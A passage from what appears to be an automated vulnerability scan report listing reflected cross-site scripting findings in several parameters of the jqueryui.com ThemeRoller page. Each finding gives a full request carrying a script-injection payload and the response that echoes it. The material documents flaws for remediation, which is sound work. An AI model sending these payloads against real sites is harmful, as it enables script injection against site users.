gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0be7a0"><script>alert(1)</script>49a1231156c&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.88. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fbce"><script>alert(1)</script>c9c900eb451 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=08fbce"><script>alert(1)</script>c9c900eb451&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=08fbce"><script>alert(1)</script>c9c900eb451&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.89. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a98d2"><script>alert(1)</script>3cb669f0c48 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pnga98d2"><script>alert(1)</script>3cb669f0c48&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pnga98d2"><script>alert(1)</script>3cb669f0c48&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

1.90. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c7e"><script>alert(1)</script>74dec3933ad was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png78c7e"><script>alert(1)</script>74dec3933ad&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png78c7e"><script>alert(1)</script>74dec3933ad&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefaul
...[SNIP]...

1.91. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e447d"><script>alert(1)</script>8562d8ecc01 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.pnge447d"><script>alert(1)</script>8562d8ecc01&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.pnge447d"><script>alert(1)</script>8562d8ecc01&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&ic
...[SNIP]...

1.92. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf048"><script>alert(1)</script>f93ea758174 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngcf048"><script>alert(1)</script>f93ea758174&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngcf048"><script>alert(1)</script>f93ea758174&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

1.93. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be4a"><script>alert(1)</script>8fe8b3a7116 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png8be4a"><script>alert(1)</script>8fe8b3a7116&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png8be4a"><script>alert(1)</script>8fe8b3a7116&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcConte
...[SNIP]...

1.94. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c48"><script>alert(1)</script>710e7345956 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png76c48"><script>alert(1)</script>710e7345956&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png76c48"><script>alert(1)</script>710e7345956&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.95. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd47"><script>alert(1)</script>5c6bd411a2e was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.pngebd47"><script>alert(1)</script>5c6bd411a2e&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.pngebd47"><script>alert(1)</script>5c6bd411a2e&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009
...[SNIP]...

1.96. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c68d8"><script>alert(1)</script>af61a3700a5 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngc68d8"><script>alert(1)</script>af61a3700a5&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
